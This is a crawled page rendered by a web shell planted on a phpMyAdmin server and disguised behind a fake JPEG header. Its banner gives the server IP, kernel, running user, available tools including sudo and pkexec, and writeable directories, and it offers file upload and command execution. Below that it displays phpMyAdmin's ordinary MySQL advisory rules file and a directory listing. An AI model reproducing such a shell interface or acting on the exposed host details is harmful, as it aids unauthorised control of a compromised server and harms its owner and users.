JFIFHHC     C  " 5????! ??? JFIF    >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality C     p!ranha?
Server IP : 172.67.137.82  /  Your IP : 104.23.197.223
Web Server : Apache/2.4.51 (Unix) OpenSSL/1.1.1n
System : Linux ip-172-26-8-243 4.19.0-27-cloud-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : daemon ( 1)
PHP Version : 7.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitnami/stack/phpmyadmin/libraries/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/bitnami/stack/phpmyadmin/libraries/advisory_rules_generic.php
<?php

declare(strict_types=1);

return [
    // Queries
    [
        'id' => 'Uptime below one day',
        'name' => __('Uptime below one day'),
        'formula' => 'Uptime',
        'test' => 'value < 86400',
        'issue' => __('Uptime is less than 1 day, performance tuning may not be accurate.'),
        'recommendation' => __(
            'To have more accurate averages it is recommended to let the server run for'
            . ' longer than a day before running this analyzer'
        ),
        'justification' => __('The uptime is only %s'),
        'justification_formula' => 'ADVISOR_timespanFormat(Uptime)',
    ],
    [
        'id' => 'Questions below 1,000',
        'name' => __('Questions below 1,000'),
        'formula' => 'Questions',
        'test' => 'value < 1000',
        'issue' => __(
            'Fewer than 1,000 questions have been run against this server.'
            . ' The recommendations may not be accurate.'
        ),
        'recommendation' => __(
            'Let the server run for a longer time until it has executed a greater amount of queries.'
        ),
        'justification' => __('Current amount of Questions: %s'),
        'justification_formula' => 'Questions',
    ],
    [
        'id' => 'Percentage of slow queries',
        'name' => __('Percentage of slow queries'),
        'precondition' => 'Questions > 0',
        'formula' => 'Slow_queries / Questions * 100',
        'test' => 'value >= 5',
        'issue' => __('There is a lot of slow queries compared to the overall amount of Queries.'),
        'recommendation' => __(
            'You might want to increase {long_query_time}'
            . ' or optimize the queries listed in the slow query log'
        ),
        'justification' => __('The slow query rate should be below 5%%, your value is %s%%.'),
        'justification_formula' => 'round(value,2)',
    ],
    [
        'id' => 'Slow query rate',
        'name' => __('Slow query rate'),
        'precondition' => 'Questions > 0',
        'formula' => '(Slow_queries / Questions * 100) / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('There is a high percentage of slow queries compared to the server uptime.'),
        'recommendation' => __(
            'You might want to increase {long_query_time}'
            . ' or optimize the queries listed in the slow query log'
        ),
        'justification' => __('You have a slow query rate of %s per hour, you should have less than 1%% per hour.'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Long query time',
        'name' => __('Long query time'),
        'formula' => 'long_query_time',
        'test' => 'value >= 10',
        'issue' => __(
            '{long_query_time} is set to 10 seconds or more,'
            . ' thus only slow queries that take above 10 seconds are logged.'
        ),
        'recommendation' => __(
            'It is suggested to set {long_query_time} to a lower value, depending on your environment.'
            . ' Usually a value of 1-5 seconds is suggested.'
        ),
        'justification' => __('long_query_time is currently set to %ds.'),
        'justification_formula' => 'value',
    ],
    [
        'id' => 'Slow query logging',
        'name' => __('Slow query logging'),
        'precondition' => 'PMA_MYSQL_INT_VERSION < 50600',
        'formula' => 'log_slow_queries',
        'test' => 'value == \'OFF\'',
        'issue' => __('The slow query log is disabled.'),
        'recommendation' => __(
            'Enable slow query logging by setting {log_slow_queries} to \'ON\'.'
            . ' This will help troubleshooting badly performing queries.'
        ),
        'justification' => __('log_slow_queries is set to \'OFF\''),
    ],
    [
        'id' => 'Slow query logging',
        'name' => __('Slow query logging'),
        'precondition' => 'PMA_MYSQL_INT_VERSION >= 50600',
        'formula' => 'slow_query_log',
        'test' => 'value == \'OFF\'',
        'issue' => __('The slow query log is disabled.'),
        'recommendation' => __(
            'Enable slow query logging by setting {slow_query_log} to \'ON\'.'
            . ' This will help troubleshooting badly performing queries.'
        ),
        'justification' => __('slow_query_log is set to \'OFF\''),
    ],
    // Versions
    [
        'id' => 'Release Series',
        'name' => __('Release Series'),
        'formula' => 'version',
        'test' => 'substr(value,0,2) <= \'5.\' && substr(value,2,1) < 1',
        'issue' => __('The MySQL server version less than 5.1.'),
        'recommendation' => __(
            'You should upgrade, as MySQL 5.1 has improved performance, and MySQL 5.5 even more so.'
        ),
        'justification' => __('Current version: %s'),
        'justification_formula' => 'value',
    ],
    [
        'id' => 'Minor Version',
        'name' => __('Minor Version'),
        'precondition' => '! fired(\'Release Series\')',
        'formula' => 'version',
        'test' => 'substr(value,0,2) <= \'5.\' && substr(value,2,1) <= 1 && substr(value,4,2) < 30',
        'issue' => __('Version less than 5.1.30 (the first GA release of 5.1).'),
        'recommendation' => __(
            'You should upgrade, as recent versions of MySQL 5.1 have improved performance'
            . ' and MySQL 5.5 even more so.'
        ),
        'justification' => __('Current version: %s'),
        'justification_formula' => 'value',
    ],
    [
        'id' => 'Minor Version',
        'name' => __('Minor Version'),
        'precondition' => '! fired(\'Release Series\')',
        'formula' => 'version',
        'test' => 'substr(value,0,1) == 5 && substr(value,2,1) == 5 && substr(value,4,2) < 8',
        'issue' => __('Version less than 5.5.8 (the first GA release of 5.5).'),
        'recommendation' => __('You should upgrade, to a stable version of MySQL 5.5.'),
        'justification' => __('Current version: %s'),
        'justification_formula' => 'value',
    ],
    [
        'id' => 'Distribution',
        'name' => __('Distribution'),
        'formula' => 'version_comment',
        'test' => 'preg_match(\'/source/i\',value)',
        'issue' => __('Version is compiled from source, not a MySQL official binary.'),
        'recommendation' => __(
            'If you did not compile from source, you may be using a package modified by a distribution.'
            . ' The MySQL manual only is accurate for official MySQL binaries,'
            . ' not any package distributions (such as RedHat, Debian/Ubuntu etc).'
        ),
        'justification' => __('\'source\' found in version_comment'),
    ],
    [
        'id' => 'Distribution',
        'name' => __('Distribution'),
        'formula' => 'version_comment',
        'test' => 'preg_match(\'/percona/i\',value)',
        'issue' => __('The MySQL manual only is accurate for official MySQL binaries.'),
        'recommendation' => __(
            'Percona documentation is at <a href="https://www.percona.com/software/documentation/">'
            . 'https://www.percona.com/software/documentation/</a>'
        ),
        'justification' => __('\'percona\' found in version_comment'),
    ],
    [
        'id' => 'MySQL Architecture',
        'name' => __('MySQL Architecture'),
        'formula' => 'system_memory',
        'test' => 'value > 3072*1024 && !preg_match(\'/64/\',version_compile_machine)'
            . ' && !preg_match(\'/64/\',version_compile_os)',
        'issue' => __('MySQL is not compiled as a 64-bit package.'),
        'recommendation' => __(
            'Your memory capacity is above 3 GiB (assuming the Server is on localhost),'
            . ' so MySQL might not be able to access all of your memory.'
            . ' You might want to consider installing the 64-bit version of MySQL.'
        ),
        'justification' => __('Available memory on this host: %s'),
        'justification_formula' => 'ADVISOR_formatByteDown(value*1024, 2, 2)',
    ],
    // Query cache
    [
        'id' => 'Query caching method',
        'name' => __('Query caching method'),
        'precondition' => '!fired(\'Query cache disabled\')',
        'formula' => 'Questions / Uptime',
        'test' => 'value > 100',
        'issue' => __('Suboptimal caching method.'),
        'recommendation' => __(
            'You are using the MySQL Query cache with a fairly high traffic database.'
            . ' It might be worth considering to use '
            . '<a href="https://dev.mysql.com/doc/refman/5.6/en/ha-memcached.html">memcached</a>'
            . ' instead of the MySQL Query cache, especially if you have multiple slaves.'
        ),
        'justification' => __(
            'The query cache is enabled and the server receives %d queries per second.'
            . ' This rule fires if there is more than 100 queries per second.'
        ),
        'justification_formula' => 'round(value,1)',
    ],
    // Sorts
    [
        'id' => 'Percentage of sorts that cause temporary tables',
        'name' => __('Percentage of sorts that cause temporary tables'),
        'precondition' => 'Sort_scan + Sort_range > 0',
        'formula' => 'Sort_merge_passes / (Sort_scan + Sort_range) * 100',
        'test' => 'value > 10',
        'issue' => __('Too many sorts are causing temporary tables.'),
        'recommendation' => __(
            'Consider increasing {sort_buffer_size} and/or {read_rnd_buffer_size},'
            . ' depending on your system memory limits.'
        ),
        'justification' => __('%s%% of all sorts cause temporary tables, this value should be lower than 10%%.'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Rate of sorts that cause temporary tables',
        'name' => __('Rate of sorts that cause temporary tables'),
        'formula' => 'Sort_merge_passes / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('Too many sorts are causing temporary tables.'),
        'recommendation' => __(
            'Consider increasing {sort_buffer_size} and/or {read_rnd_buffer_size},'
            . ' depending on your system memory limits.'
        ),
        'justification' => __('Temporary tables average: %s, this value should be less than 1 per hour.'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Sort rows',
        'name' => __('Sort rows'),
        'formula' => 'Sort_rows / Uptime',
        'test' => 'value * 60 >= 1',
        'issue' => __('There are lots of rows being sorted.'),
        'recommendation' => __(
            'While there is nothing wrong with a high amount of row sorting, you might want to'
            . ' make sure that the queries which require a lot of sorting use indexed columns in'
            . ' the ORDER BY clause, as this will result in much faster sorting.'
        ),
        'justification' => __('Sorted rows average: %s'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    // Joins, scans
    [
        'id' => 'Rate of joins without indexes',
        'name' => __('Rate of joins without indexes'),
        'formula' => '(Select_range_check + Select_scan + Select_full_join) / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('There are too many joins without indexes.'),
        'recommendation' => __(
            'This means that joins are doing full table scans. Adding indexes for the columns being'
            . ' used in the join conditions will greatly speed up table joins.'
        ),
        'justification' => __('Table joins average: %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Rate of reading first index entry',
        'name' => __('Rate of reading first index entry'),
        'formula' => 'Handler_read_first / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('The rate of reading the first index entry is high.'),
        'recommendation' => __(
            'This usually indicates frequent full index scans. Full index scans are faster than'
            . ' table scans but require lots of CPU cycles in big tables, if those tables that have or'
            . ' had high volumes of UPDATEs and DELETEs, running \'OPTIMIZE TABLE\' might reduce the'
            . ' amount of and/or speed up full index scans. Other than that full index scans can'
            . ' only be reduced by rewriting queries.'
        ),
        'justification' => __('Index scans average: %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Rate of reading fixed position',
        'name' => __('Rate of reading fixed position'),
        'formula' => 'Handler_read_rnd / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('The rate of reading data from a fixed position is high.'),
        'recommendation' => __(
            'This indicates that many queries need to sort results and/or do a full table scan,'
            . ' including join queries that do not use indexes. Add indexes where applicable.'
        ),
        'justification' => __('Rate of reading fixed position average: %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Rate of reading next table row',
        'name' => __('Rate of reading next table row'),
        'formula' => 'Handler_read_rnd_next / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('The rate of reading the next table row is high.'),
        'recommendation' => __(
            'This indicates that many queries are doing full table scans. Add indexes where applicable.'
        ),
        'justification' => __('Rate of reading next table row: %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    // Temp tables
    [
        'id' => 'Different tmp_table_size and max_heap_table_size',
        'name' => __('Different tmp_table_size and max_heap_table_size'),
        'formula' => 'tmp_table_size - max_heap_table_size',
        'test' => 'value !=0',
        'issue' => __('{tmp_table_size} and {max_heap_table_size} are not the same.'),
        'recommendation' => __(
            'If you have deliberately changed one of either: The server uses the lower value of either'
            . ' to determine the maximum size of in-memory tables. So if you wish to increase the'
            . ' in-memory table limit you will have to increase the other value as well.'
        ),
        'justification' => __('Current values are tmp_table_size: %s, max_heap_table_size: %s'),
        'justification_formula' => 'ADVISOR_formatByteDown(tmp_table_size, 2, 2),'
            . ' ADVISOR_formatByteDown(max_heap_table_size, 2, 2)',
    ],
    [
        'id' => 'Percentage of temp tables on disk',
        'name' => __('Percentage of temp tables on disk'),
        'precondition' => 'Created_tmp_tables + Created_tmp_disk_tables > 0',
        'formula' => 'Created_tmp_disk_tables / (Created_tmp_tables + Created_tmp_disk_tables) * 100',
        'test' => 'value > 25',
        'issue' => __('Many temporary tables are being written to disk instead of being kept in memory.'),
        'recommendation' => __(
            'Increasing {max_heap_table_size} and {tmp_table_size} might help. However some'
            . ' temporary tables are always being written to disk, independent of the value of these variables.'
            . ' To eliminate these you will have to rewrite your queries to avoid those conditions'
            . ' (Within a temporary table: Presence of a BLOB or TEXT column or presence of a column'
            . ' bigger than 512 bytes) as mentioned in the beginning of an <a href="'
            . 'https://www.facebook.com/note.php?note_id=10150111255065841&comments'
            . '">Article by the Pythian Group</a>'
        ),
        'justification' => __(
            '%s%% of all temporary tables are being written to disk, this value should be below 25%%'
        ),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Temp disk rate',
        'name' => __('Temp disk rate'),
        'precondition' => '!fired(\'Percentage of temp tables on disk\')',
        'formula' => 'Created_tmp_disk_tables / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('Many temporary tables are being written to disk instead of being kept in memory.'),
        'recommendation' => __(
            'Increasing {max_heap_table_size} and {tmp_table_size} might help. However some'
            . ' temporary tables are always being written to disk, independent of the value of these variables.'
            . ' To eliminate these you will have to rewrite your queries to avoid those conditions'
            . ' (Within a temporary table: Presence of a BLOB or TEXT column or presence of a column'
            . ' bigger than 512 bytes) as mentioned in the <a href="'
            . 'https://dev.mysql.com/doc/refman/8.0/en/internal-temporary-tables.html'
            . '">MySQL Documentation</a>'
        ),
        'justification' => __(
            'Rate of temporary tables being written to disk: %s, this value should be less than 1 per hour'
        ),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    // MyISAM index cache
    [
        'id' => 'MyISAM key buffer size',
        'name' => __('MyISAM key buffer size'),
        'formula' => 'key_buffer_size',
        'test' => 'value == 0',
        'issue' => __('Key buffer is not initialized. No MyISAM indexes will be cached.'),
        'recommendation' => __(
            'Set {key_buffer_size} depending on the size of your MyISAM indexes. 64M is a good start.'
        ),
        'justification' => __('key_buffer_size is 0'),
    ],
    [
        'id' => 'Max % MyISAM key buffer ever used',
        /* xgettext:no-php-format */
        'name' => __('Max % MyISAM key buffer ever used'),
        'precondition' => 'key_buffer_size > 0',
        'formula' => 'Key_blocks_used * key_cache_block_size / key_buffer_size * 100',
        'test' => 'value < 95',
        /* xgettext:no-php-format */
        'issue' => __('MyISAM key buffer (index cache) % used is low.'),
        'recommendation' => __(
            'You may need to decrease the size of {key_buffer_size}, re-examine your tables to see'
            . ' if indexes have been removed, or examine queries and expectations'
            . ' about what indexes are being used.'
        ),
        'justification' => __('max %% MyISAM key buffer ever used: %s%%, this value should be above 95%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Percentage of MyISAM key buffer used',
        'name' => __('Percentage of MyISAM key buffer used'),
        // Don't fire if above rule fired - we don't need the same advice twice
        'precondition' => 'key_buffer_size > 0 && !fired(\'Max % MyISAM key buffer ever used\')',
        'formula' => '( 1 - Key_blocks_unused * key_cache_block_size / key_buffer_size) * 100',
        'test' => 'value < 95',
        /* xgettext:no-php-format */
        'issue' => __('MyISAM key buffer (index cache) % used is low.'),
        'recommendation' => __(
            'You may need to decrease the size of {key_buffer_size}, re-examine your tables to see'
            . ' if indexes have been removed, or examine queries and expectations'
            . ' about what indexes are being used.'
        ),
        'justification' => __('%% MyISAM key buffer used: %s%%, this value should be above 95%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Percentage of index reads from memory',
        'name' => __('Percentage of index reads from memory'),
        'precondition' => 'Key_read_requests > 0',
        'formula' => '100 - (Key_reads / Key_read_requests * 100)',
        'test' => 'value < 95',
        /* xgettext:no-php-format */
        'issue' => __('The % of indexes that use the MyISAM key buffer is low.'),
        'recommendation' => __('You may need to increase {key_buffer_size}.'),
        'justification' => __('Index reads from memory: %s%%, this value should be above 95%%'),
        'justification_formula' => 'round(value,1)',
    ],
    // Other caches
    [
        'id' => 'Rate of table open',
        'name' => __('Rate of table open'),
        'formula' => 'Opened_tables / Uptime',
        'test' => 'value*60*60 > 10',
        'issue' => __('The rate of opening tables is high.'),
        'recommendation' => __(
            'Opening tables requires disk I/O which is costly.'
            . ' Increasing {table_open_cache} might avoid this.'
        ),
        'justification' => __('Opened table rate: %s, this value should be less than 10 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Percentage of used open files limit',
        'name' => __('Percentage of used open files limit'),
        'formula' => 'Open_files / open_files_limit * 100',
        'test' => 'value > 85',
        'issue' => __(
            'The number of open files is approaching the max number of open files.'
            . ' You may get a "Too many open files" error.'
        ),
        'recommendation' => __(
            'Consider increasing {open_files_limit}, and check the error log when'
            . ' restarting after changing {open_files_limit}.'
        ),
        'justification' => __('The number of opened files is at %s%% of the limit. It should be below 85%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Rate of open files',
        'name' => __('Rate of open files'),
        'formula' => 'Open_files / Uptime',
        'test' => 'value * 60 * 60 > 5',
        'issue' => __('The rate of opening files is high.'),
        'recommendation' => __(
            'Consider increasing {open_files_limit}, and check the error log when'
            . ' restarting after changing {open_files_limit}.'
        ),
        'justification' => __('Opened files rate: %s, this value should be less than 5 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Immediate table locks %',
        /* xgettext:no-php-format */
        'name' => __('Immediate table locks %'),
        'precondition' => 'Table_locks_waited + Table_locks_immediate > 0',
        'formula' => 'Table_locks_immediate / (Table_locks_waited + Table_locks_immediate) * 100',
        'test' => 'value < 95',
        'issue' => __('Too many table locks were not granted immediately.'),
        'recommendation' => __('Optimize queries and/or use InnoDB to reduce lock wait.'),
        'justification' => __('Immediate table locks: %s%%, this value should be above 95%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Table lock wait rate',
        'name' => __('Table lock wait rate'),
        'formula' => 'Table_locks_waited / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('Too many table locks were not granted immediately.'),
        'recommendation' => __('Optimize queries and/or use InnoDB to reduce lock wait.'),
        'justification' => __('Table lock wait rate: %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Thread cache',
        'name' => __('Thread cache'),
        'formula' => 'thread_cache_size',
        'test' => 'value < 1',
        'issue' => __('Thread cache is disabled, resulting in more overhead from new connections to MySQL.'),
        'recommendation' => __('Enable the thread cache by setting {thread_cache_size} > 0.'),
        'justification' => __('The thread cache is set to 0'),
    ],
    [
        'id' => 'Thread cache hit rate %',
        /* xgettext:no-php-format */
        'name' => __('Thread cache hit rate %'),
        'precondition' => 'thread_cache_size > 0',
        'formula' => '100 - Threads_created / Connections',
        'test' => 'value < 80',
        'issue' => __('Thread cache is not efficient.'),
        'recommendation' => __('Increase {thread_cache_size}.'),
        'justification' => __('Thread cache hitrate: %s%%, this value should be above 80%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Threads that are slow to launch',
        'name' => __('Threads that are slow to launch'),
        'precondition' => 'slow_launch_time > 0',
        'formula' => 'Slow_launch_threads',
        'test' => 'value > 0',
        'issue' => __('There are too many threads that are slow to launch.'),
        'recommendation' => __(
            'This generally happens in case of general system overload as it is pretty simple'
            . ' operations. You might want to monitor your system load carefully.'
        ),
        'justification' => __('%s thread(s) took longer than %s seconds to start, it should be 0'),
        'justification_formula' => 'value, slow_launch_time',
    ],
    [
        'id' => 'Slow launch time',
        'name' => __('Slow launch time'),
        'formula' => 'slow_launch_time',
        'test' => 'value > 2',
        'issue' => __('Slow_launch_time is above 2s.'),
        'recommendation' => __(
            'Set {slow_launch_time} to 1s or 2s to correctly count threads that are slow to launch.'
        ),
        'justification' => __('slow_launch_time is set to %s'),
        'justification_formula' => 'value',
    ],
    // Connections
    [
        'id' => 'Percentage of used connections',
        'name' => __('Percentage of used connections'),
        'formula' => 'Max_used_connections / max_connections * 100',
        'test' => 'value > 80',
        'issue' => __(
            'The maximum amount of used connections is getting close to the value of {max_connections}.'
        ),
        'recommendation' => __(
            'Increase {max_connections}, or decrease {wait_timeout} so that connections that do not'
            . ' close database handlers properly get killed sooner.'
            . ' Make sure the code closes database handlers properly.'
        ),
        'justification' => __('Max_used_connections is at %s%% of max_connections, it should be below 80%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Percentage of aborted connections',
        'name' => __('Percentage of aborted connections'),
        'formula' => 'Aborted_connects / Connections * 100',
        'test' => 'value > 1',
        'issue' => __('Too many connections are aborted.'),
        'recommendation' => __(
            'Connections are usually aborted when they cannot be authorized. <a href="'
            . 'https://www.percona.com/blog/2008/08/23/how-to-track-down-the-source-of-aborted_connects/'
            . '">This article</a> might help you track down the source.'
        ),
        'justification' => __('%s%% of all connections are aborted. This value should be below 1%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Rate of aborted connections',
        'name' => __('Rate of aborted connections'),
        'formula' => 'Aborted_connects / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('Too many connections are aborted.'),
        'recommendation' => __(
            'Connections are usually aborted when they cannot be authorized. <a href="'
            . 'https://www.percona.com/blog/2008/08/23/how-to-track-down-the-source-of-aborted_connects/'
            . '">This article</a> might help you track down the source.'
        ),
        'justification' => __('Aborted connections rate is at %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    [
        'id' => 'Percentage of aborted clients',
        'name' => __('Percentage of aborted clients'),
        'formula' => 'Aborted_clients / Connections * 100',
        'test' => 'value > 2',
        'issue' => __('Too many clients are aborted.'),
        'recommendation' => __(
            'Clients are usually aborted when they did not close their connection to MySQL properly.'
            . ' This can be due to network issues or code not closing a database handler properly.'
            . ' Check your network and code.'
        ),
        'justification' => __('%s%% of all clients are aborted. This value should be below 2%%'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Rate of aborted clients',
        'name' => __('Rate of aborted clients'),
        'formula' => 'Aborted_clients / Uptime',
        'test' => 'value * 60 * 60 > 1',
        'issue' => __('Too many clients are aborted.'),
        'recommendation' => __(
            'Clients are usually aborted when they did not close their connection to MySQL properly.'
            . ' This can be due to network issues or code not closing a database handler properly.'
            . ' Check your network and code.'
        ),
        'justification' => __('Aborted client rate is at %s, this value should be less than 1 per hour'),
        'justification_formula' => 'ADVISOR_bytime(value,2)',
    ],
    // InnoDB
    [
        'id' => 'Is InnoDB disabled?',
        'name' => __('Is InnoDB disabled?'),
        'precondition' => 'PMA_MYSQL_INT_VERSION < 50600',
        'formula' => 'have_innodb',
        'test' => 'value != "YES"',
        'issue' => __('You do not have InnoDB enabled.'),
        'recommendation' => __('InnoDB is usually the better choice for table engines.'),
        'justification' => __('have_innodb is set to \'value\''),
    ],
    [
        'id' => 'InnoDB log size',
        'name' => __('InnoDB log size'),
        'precondition' => 'innodb_buffer_pool_size > 0',
        'formula' => '(innodb_log_file_size * innodb_log_files_in_group)/ innodb_buffer_pool_size * 100',
        'test' => 'value < 20 && innodb_log_file_size / (1024 * 1024) < 256',
        'issue' => __(
            'The InnoDB log file size is not an appropriate size, in relation to the InnoDB buffer pool.'
        ),
        'recommendation' => __(/* xgettext:no-php-format */
            'Especially on a system with a lot of writes to InnoDB tables you should set'
            . ' {innodb_log_file_size} to 25% of {innodb_buffer_pool_size}. However the bigger this value,'
            . ' the longer the recovery time will be when database crashes, so this value should not be set'
            . ' much higher than 256 MiB. Please note however that you cannot simply change the value of'
            . ' this variable. You need to shutdown the server, remove the InnoDB log files, set the new'
            . ' value in my.cnf, start the server, then check the error logs if everything went fine.'
            . ' See also <a href="'
            . 'https://mysqldatabaseadministration.blogspot.com/2007/01/increase-innodblogfilesize-proper-way.html'
            . '">this blog entry</a>'
        ),
        'justification' => __(
            'Your InnoDB log size is at %s%% in relation to the InnoDB buffer pool size,'
            . ' it should not be below 20%%'
        ),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'Max InnoDB log size',
        'name' => __('Max InnoDB log size'),
        'precondition' => 'innodb_buffer_pool_size > 0 && innodb_log_file_size / innodb_buffer_pool_size * 100 < 30',
        'formula' => 'innodb_log_file_size / (1024 * 1024)',
        'test' => 'value > 256',
        'issue' => __('The InnoDB log file size is inadequately large.'),
        'recommendation' => __(/* xgettext:no-php-format */
            'It is usually sufficient to set {innodb_log_file_size} to 25% of the size of'
            . ' {innodb_buffer_pool_size}. A very big {innodb_log_file_size} slows down the recovery'
            . ' time after a database crash considerably. See also '
            . '<a href="https://www.percona.com/blog/2006/07/03/choosing-proper-innodb_log_file_size/">'
            . 'this Article</a>. You need to shutdown the server, remove the InnoDB log files, set the'
            . ' new value in my.cnf, start the server, then check the error logs'
            . ' if everything went fine. See also <a href="'
            . 'https://mysqldatabaseadministration.blogspot.com/2007/01/increase-innodblogfilesize-proper-way.html'
            . '">this blog entry</a>'
        ),
        'justification' => __('Your absolute InnoDB log size is %s MiB'),
        'justification_formula' => 'round(value,1)',
    ],
    [
        'id' => 'InnoDB buffer pool size',
        'name' => __('InnoDB buffer pool size'),
        'precondition' => 'system_memory > 0',
        'formula' => 'innodb_buffer_pool_size / system_memory * 100',
        'test' => 'value < 60',
        'issue' => __('Your InnoDB buffer pool is fairly small.'),
        'recommendation' => __(/* xgettext:no-php-format */
            'The InnoDB buffer pool has a profound impact on performance for InnoDB tables.'
            . ' Assign all your remaining memory to this buffer. For database servers that use solely InnoDB'
            . ' as storage engine and have no other services (e.g. a web server) running, you may set this'
            . ' as high as 80% of your available memory. If that is not the case, you need to carefully'
            . ' assess the memory consumption of your other services and non-InnoDB-Tables and set this'
            . ' variable accordingly. If it is set too high, your system will start swapping,'
            . ' which decreases performance significantly. See also '
            . '<a href="https://www.percona.com/blog/2007/11/03/choosing-innodb_buffer_pool_size/">this article</a>'
        ),
        'justification' => __(
            'You are currently using %s%% of your memory for the InnoDB buffer pool.'
            . ' This rule fires if you are assigning less than 60%%, however this might be perfectly'
            . ' adequate for your system if you don\'t have much InnoDB tables'
            . ' or other services running on the same machine.'
        ),
        'justification_formula' => 'value',
    ],
    // Other
    [
        'id' => 'MyISAM concurrent inserts',
        'name' => __('MyISAM concurrent inserts'),
        'formula' => 'concurrent_insert',
        'test' => 'value === 0 || value === \'NEVER\'',
        'issue' => __('Enable {concurrent_insert} by setting it to 1'),
        'recommendation' => __(
            'Setting {concurrent_insert} to 1 reduces contention between'
            . ' readers and writers for a given table. See also '
            . '<a href="https://dev.mysql.com/doc/refman/5.5/en/concurrent-inserts.html">MySQL Documentation</a>'
        ),
        'justification' => __('concurrent_insert is set to 0'),
    ],
];
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
October 08 2021 19:07:54
bitnami / daemon
0775
cache
--
June 04 2021 06:17:17
bitnami / daemon
0775
certs
--
June 04 2021 06:17:17
bitnami / daemon
0775
classes
--
June 04 2021 06:17:17
bitnami / daemon
0775
advisory_rules_generic.php
34.348 KB
June 04 2021 06:10:00
bitnami / daemon
0664
advisory_rules_mysql_before80003.php
6.186 KB
June 04 2021 06:10:00
bitnami / daemon
0664
common.inc.php
8.465 KB
June 04 2021 06:10:00
bitnami / daemon
0664
config.default.php
70.128 KB
June 04 2021 06:10:00
bitnami / daemon
0664
config.values.php
13.197 KB
June 04 2021 06:10:00
bitnami / daemon
0664
language_stats.inc.php
1.61 KB
June 04 2021 06:10:00
bitnami / daemon
0664
routes.php
23.647 KB
June 04 2021 06:10:00
bitnami / daemon
0664
services.php
6.756 KB
June 04 2021 06:10:00
bitnami / daemon
0664
services_controllers.php
36.883 KB
June 04 2021 06:10:00
bitnami / daemon
0664
services_loader.php
1.577 KB
June 04 2021 06:10:00
bitnami / daemon
0664
vendor_config.php
2.174 KB
June 04 2021 06:10:00
bitnami / daemon
0664
